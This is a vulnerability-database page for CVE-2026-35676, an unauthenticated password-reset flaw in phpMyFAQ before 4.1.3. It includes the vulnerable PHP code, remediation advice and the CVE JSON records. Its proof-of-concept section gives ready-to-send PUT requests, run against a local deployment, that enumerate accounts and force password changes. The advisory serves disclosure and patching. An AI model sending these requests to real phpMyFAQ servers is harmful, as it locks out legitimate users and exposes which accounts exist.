Vulnerability-Lookup

GHSA-9QV9-8XV6-5P35

Vulnerability from github – Published: 2026-05-20 15:45 – Updated: 2026-05-28 14:23

Summary

phpMyFAQ: Unauthenticated Password Reset Endpoint Allows User Enumeration and Forced Password Change Without Token Validation

Details

Summary

The password reset API can be triggered without authentication and without any out-of-band confirmation step.

If an attacker knows a valid username + email pair, they can call the reset endpoint directly. The application immediately generates a new password, writes it to the account, and only then sends the new password by email.

This creates two issues at the same time:

account enumeration through the response difference between valid and invalid pairs
forced password reset of another user's account, which invalidates the old password immediately

In my local reproduction, I confirmed both the response difference and the password change itself.

Details

The relevant code is in phpmyfaq/src/phpMyFAQ/Controller/Frontend/Api/UnauthorizedUserController.php.

The route is exposed without authentication:

#[Route(path: 'user/password/update', name: 'api.private.user.password', methods: ['PUT'])]
public function updatePassword(Request $request): JsonResponse

The flow is straightforward:

$loginExist = $user->getUserByLogin($username);

if ($loginExist && $email === $user->getUserData('email')) {
    $newPassword = $user->createPassword();
    $user->changePassword($newPassword);
    $mail->send();
    return $this->json(['success' => Translation::get(key: 'lostpwd_mail_okay')], Response::HTTP_OK);
}

return $this->json(['error' => Translation::get(key: 'lostpwd_err_1')], Response::HTTP_CONFLICT);

The core issue is that the password is changed immediately after a simple username and email match. There is no reset token, no confirmation link, no second step, and no requirement that the caller prove control of the mailbox before the password is replaced.

That means the endpoint is not just a "forgot password email sender". It is an actual unauthenticated password change trigger.

PoC

This was reproduced against a local Docker deployment of the project.

For a valid username and email pair:

PUT /api/index.php/user/password/update HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json

{"username":"user1","email":"user1@example.com"}

Response:

HTTP/1.0 200 OK
Content-Type: application/json

{"success":"Email has been sent."}

For an invalid pair:

PUT /api/index.php/user/password/update HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json

{"username":"user1","email":"wrong@example.com"}

Response:

HTTP/1.0 409 Conflict
Content-Type: application/json

{"error":"Error: Username and email address not found."}

That already confirms enumeration.

To verify that the password really changes, created a test account:

username: user2
password: Oldpass123!
email: user2@example.com

Before calling the endpoint, the password hash stored in faquserlogin was:

481bf096fd16e68ebbb8b98368bc0b5c17631a00f01a36dbb4a8dade0f0b8125

Then send:

PUT /api/index.php/user/password/update HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json

{"username":"user2","email":"user2@example.com"}

The response was:

HTTP/1.0 200 OK
Content-Type: application/json

{"success":"Email has been sent."}

After that, the stored hash changed to:

3497f20c251da705f673dcac500fbf9e2e2e495719a7e2df9be08db42bf1286f

Then try to log in with the old password:

POST /authenticate HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded

faqusername=user2&faqpassword=Oldpass123!

The application redirected back to the login page and reported that the password was incorrect.

So this is not just a cosmetic issue in the API response. The old credential really becomes invalid.

Impact

The most realistic impact here is forced password reset and account disruption.

An attacker who knows or can guess a valid username and email pair can:

confirm whether the pair is valid
force the target account's password to change
cause the victim's old password to stop working immediately

If the attacker does not control the victim's mailbox, this is usually a denial-of-service style account disruption rather than instant account takeover. That is the main reason I would keep the severity at Medium.

Even so, this is still a real security issue. Password recovery should not allow an unauthenticated caller to change the account password directly.

Remediation

Recommend to change the password recovery flow to a token-based design.

Do not change the password inside the unauthenticated endpoint.
Generate a short-lived, single-use reset token and send only the reset link by email.
Return the same generic response for both valid and invalid username/email pairs.
Keep rate limiting in place, but do not rely on it as the main protection.
Add regression tests that verify the password hash does not change until a valid reset token is presented.

Severity

8.2 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "thorsten/phpmyfaq"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.1.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "phpmyfaq/phpmyfaq"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.1.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-35676"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-640"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-20T15:45:53Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nThe password reset API can be triggered without authentication and without any out-of-band confirmation step.\n\nIf an attacker knows a valid `username + email` pair, they can call the reset endpoint directly. The application immediately generates a new password, writes it to the account, and only then sends the new password by email.\n\nThis creates two issues at the same time:\n\n- account enumeration through the response difference between valid and invalid pairs\n- forced password reset of another user\u0027s account, which invalidates the old password immediately\n\nIn my local reproduction, I confirmed both the response difference and the password change itself.\n\n### Details\n\nThe relevant code is in `phpmyfaq/src/phpMyFAQ/Controller/Frontend/Api/UnauthorizedUserController.php`.\n\nThe route is exposed without authentication:\n\n```php\n#[Route(path: \u0027user/password/update\u0027, name: \u0027api.private.user.password\u0027, methods: [\u0027PUT\u0027])]\npublic function updatePassword(Request $request): JsonResponse\n```\n\nThe flow is straightforward:\n\n```php\n$loginExist = $user-\u003egetUserByLogin($username);\n\nif ($loginExist \u0026\u0026 $email === $user-\u003egetUserData(\u0027email\u0027)) {\n    $newPassword = $user-\u003ecreatePassword();\n    $user-\u003echangePassword($newPassword);\n    $mail-\u003esend();\n    return $this-\u003ejson([\u0027success\u0027 =\u003e Translation::get(key: \u0027lostpwd_mail_okay\u0027)], Response::HTTP_OK);\n}\n\nreturn $this-\u003ejson([\u0027error\u0027 =\u003e Translation::get(key: \u0027lostpwd_err_1\u0027)], Response::HTTP_CONFLICT);\n```\n\nThe core issue is that the password is changed immediately after a simple username and email match. There is no reset token, no confirmation link, no second step, and no requirement that the caller prove control of the mailbox before the password is replaced.\n\nThat means the endpoint is not just a \"forgot password email sender\". It is an actual unauthenticated password change trigger.\n\n### PoC\n\nThis was reproduced against a local Docker deployment of the project.\n\nFor a valid username and email pair:\n\n```http\nPUT /api/index.php/user/password/update HTTP/1.1\nHost: 127.0.0.1\nContent-Type: application/json\n\n{\"username\":\"user1\",\"email\":\"user1@example.com\"}\n```\n\nResponse:\n\n```http\nHTTP/1.0 200 OK\nContent-Type: application/json\n\n{\"success\":\"Email has been sent.\"}\n```\n\nFor an invalid pair:\n\n```http\nPUT /api/index.php/user/password/update HTTP/1.1\nHost: 127.0.0.1\nContent-Type: application/json\n\n{\"username\":\"user1\",\"email\":\"wrong@example.com\"}\n```\n\nResponse:\n\n```http\nHTTP/1.0 409 Conflict\nContent-Type: application/json\n\n{\"error\":\"Error: Username and email address not found.\"}\n```\n\nThat already confirms enumeration.\n\nTo verify that the password really changes, created a test account:\n\n- username: `user2`\n- password: `Oldpass123!`\n- email: `user2@example.com`\n\nBefore calling the endpoint, the password hash stored in `faquserlogin` was:\n\n```text\n481bf096fd16e68ebbb8b98368bc0b5c17631a00f01a36dbb4a8dade0f0b8125\n```\n\nThen send:\n\n```http\nPUT /api/index.php/user/password/update HTTP/1.1\nHost: 127.0.0.1\nContent-Type: application/json\n\n{\"username\":\"user2\",\"email\":\"user2@example.com\"}\n```\n\nThe response was:\n\n```http\nHTTP/1.0 200 OK\nContent-Type: application/json\n\n{\"success\":\"Email has been sent.\"}\n```\n\nAfter that, the stored hash changed to:\n\n```text\n3497f20c251da705f673dcac500fbf9e2e2e495719a7e2df9be08db42bf1286f\n```\n\nThen try to log in with the old password:\n\n```http\nPOST /authenticate HTTP/1.1\nHost: 127.0.0.1\nContent-Type: application/x-www-form-urlencoded\n\nfaqusername=user2\u0026faqpassword=Oldpass123!\n```\n\nThe application redirected back to the login page and reported that the password was incorrect.\n\nSo this is not just a cosmetic issue in the API response. The old credential really becomes invalid.\n\n### Impact\n\nThe most realistic impact here is forced password reset and account disruption.\n\nAn attacker who knows or can guess a valid username and email pair can:\n\n- confirm whether the pair is valid\n- force the target account\u0027s password to change\n- cause the victim\u0027s old password to stop working immediately\n\nIf the attacker does not control the victim\u0027s mailbox, this is usually a denial-of-service style account disruption rather than instant account takeover. That is the main reason I would keep the severity at **Medium**.\n\nEven so, this is still a real security issue. Password recovery should not allow an unauthenticated caller to change the account password directly.\n\n### Remediation\n\nRecommend to change the password recovery flow to a token-based design.\n\n1. Do not change the password inside the unauthenticated endpoint.\n2. Generate a short-lived, single-use reset token and send only the reset link by email.\n3. Return the same generic response for both valid and invalid username/email pairs.\n4. Keep rate limiting in place, but do not rely on it as the main protection.\n5. Add regression tests that verify the password hash does not change until a valid reset token is presented.",
  "id": "GHSA-9qv9-8xv6-5p35",
  "modified": "2026-05-28T14:23:13Z",
  "published": "2026-05-20T15:45:53Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9qv9-8xv6-5p35"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/thorsten/phpMyFAQ"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "phpMyFAQ: Unauthenticated Password Reset Endpoint Allows User Enumeration and Forced Password Change Without Token Validation"
}

CVE-2026-35676 (GCVE-0-2026-35676)

Vulnerability from cvelistv5 – Published: 2026-05-28 14:13 – Updated: 2026-05-28 15:35

Title

phpMyFAQ - Unauthenticated Password Reset via User Password Update Endpoint

Summary

phpMyFAQ before 4.1.3 contains an unauthenticated password reset vulnerability in the user password update API endpoint that allows attackers to change account passwords without token validation. Attackers can enumerate valid username and email pairs and force immediate password changes by sending PUT requests to the /api/index.php/user/password/update endpoint, causing account disruption and invalidating legitimate user credentials.

Severity

8.2 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N

8.8 (High)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N

SSVC

Exploitation: poc Automatable: yes Technical Impact: partial

CISA Coordinator (v2.0.3)

CWE

CWE-640 - Weak Password Recovery Mechanism for Forgotten Password

Assigner

VulnCheck

References

2 references

URL	Tags
https://github.com/thorsten/phpMyFAQ/security/adv…	third-party-advisory
https://www.vulncheck.com/advisories/phpmyfaq-una…	third-party-advisory

Impacted products

1 product

Vendor	Product	Version
thorsten	phpMyFAQ	Affected: 0 , < 4.1.3 (semver) Unaffected: 4.1.3 (semver)

Date Public

2026-05-14 00:00

Credits

kitu232

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-35676",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-28T15:35:26.991955Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-28T15:35:36.744Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9qv9-8xv6-5p35"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "phpMyFAQ",
          "vendor": "thorsten",
          "versions": [
            {
              "lessThan": "4.1.3",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "status": "unaffected",
              "version": "4.1.3",
              "versionType": "semver"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:a:phpmyfaq:phpmyfaq:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.1.3",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "reporter",
          "value": "kitu232"
        }
      ],
      "datePublic": "2026-05-14T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "phpMyFAQ before 4.1.3 contains an unauthenticated password reset vulnerability in the user password update API endpoint that allows attackers to change account passwords without token validation. Attackers can enumerate valid username and email pairs and force immediate password changes by sending PUT requests to the /api/index.php/user/password/update endpoint, causing account disruption and invalidating legitimate user credentials."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
            "version": "3.1"
          },
          "format": "CVSS"
        },
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "LOW",
            "vulnIntegrityImpact": "HIGH"
          },
          "format": "CVSS"
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-640",
              "description": "Weak Password Recovery Mechanism for Forgotten Password",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-28T14:15:19.821Z",
        "orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
        "shortName": "VulnCheck"
      },
      "references": [
        {
          "name": "GHSA Advisory GHSA-9qv9-8xv6-5p35",
          "tags": [
            "third-party-advisory"
          ],
          "url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9qv9-8xv6-5p35"
        },
        {
          "name": "VulnCheck Advisory: phpMyFAQ - Unauthenticated Password Reset via User Password Update Endpoint",
          "tags": [
            "third-party-advisory"
          ],
          "url": "https://www.vulncheck.com/advisories/phpmyfaq-unauthenticated-password-reset-via-user-password-update-endpoint"
        }
      ],
      "title": "phpMyFAQ - Unauthenticated Password Reset via User Password Update Endpoint",
      "x_generator": {
        "engine": "vulncheck"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
    "assignerShortName": "VulnCheck",
    "cveId": "CVE-2026-35676",
    "datePublished": "2026-05-28T14:13:15.123Z",
    "dateReserved": "2026-04-04T12:32:50.477Z",
    "dateUpdated": "2026-05-28T15:35:36.744Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

GHSA-9QV9-8XV6-5P35

Summary

Details

PoC

Impact

Remediation

CVE-2026-35676 (GCVE-0-2026-35676)

Tags

Sightings

Nomenclature